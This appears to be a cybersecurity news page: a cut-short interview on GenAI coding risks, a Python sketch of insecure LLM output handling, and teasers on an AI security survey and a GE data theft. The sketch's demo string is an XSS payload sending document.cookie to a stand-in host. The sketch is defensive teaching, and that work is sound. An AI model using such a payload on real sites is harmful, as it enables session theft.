In an exclusive interview with Cyber Intelligence, Gadi Bashvitz, CEO of cybersecurity testing firm Bright Security, warns of the security challenges facing organizations in the wake of widespread adoption of GenAI.

Cyber Intelligence: Are there any specific dangers of which companies using GenAI to generate new code should be particularly aware?

Gadi Bashvitz: There are multiple considerations here. On one hand, any solution built on LLMs is prone to LLM-specific vulnerabilities such as Insecure Output Handling and Broken Access Control, so it is critical that organizations are aware of these weaknesses and can detect them before releasing LLM-based solutions.
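To illustrate the kind of flaw Bashvitz mentions, the short sketch below shows one common form of Insecure Output Handling in a hypothetical Python web handler: model output is inserted into an HTML response without encoding, and the fix is to treat the LLM like any other untrusted input source. The function names, the llm_output parameter, and the example payload are illustrative assumptions, not drawn from Bright Security's tooling.

# Hypothetical sketch of Insecure Output Handling: raw LLM output reaches a
# sensitive sink (here, an HTML page) without validation or encoding.
import html


def render_reply_insecure(llm_output: str) -> str:
    # Vulnerable: model output is interpolated into HTML as-is, so a prompt-
    # injected "<script>...</script>" payload would run in the user's browser.
    return f"<div class='reply'>{llm_output}</div>"


def render_reply_hardened(llm_output: str) -> str:
    # Safer: HTML-escape the model output before it reaches the page, treating
    # the LLM response as untrusted data rather than trusted markup.
    return f"<div class='reply'>{html.escape(llm_output)}</div>"


if __name__ == "__main__":
    malicious = "Thanks! <script>fetch('https://evil.example/c?'+document.cookie)</script>"
    print(render_reply_insecure(malicious))   # script tag survives intact
    print(render_reply_hardened(malicious))   # script tag is neutralized

The same principle applies to other sinks such as shell commands or SQL queries: output from the model should be validated or encoded for the context in which it is used before release.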
According to the "State of AI and Security Survey Report" released by the Cloud Security Alliance and Google Cloud, 55% of organizations surveyed plan to use AI to boost security by 2025. The report also found that 67% of organizations have already tested AI-backed security capabilities and are pleased with the results.
General Electric (GE) has acknowledged the theft of data by threat actor IntelBroker pertaining to a project involving the Defense Advanced Research Projects Agency (DARPA), sparking national security concerns. A GE spokesperson said the company is thoroughly investigating the claims, will work to further protect the integrity of its security systems, and does not expect business operations to be affected.
In this roundup: experts warn of new 'polyglot' malware, AI neutralizes trillions of IT events, and Northern Ireland data breach suspects have been arrested.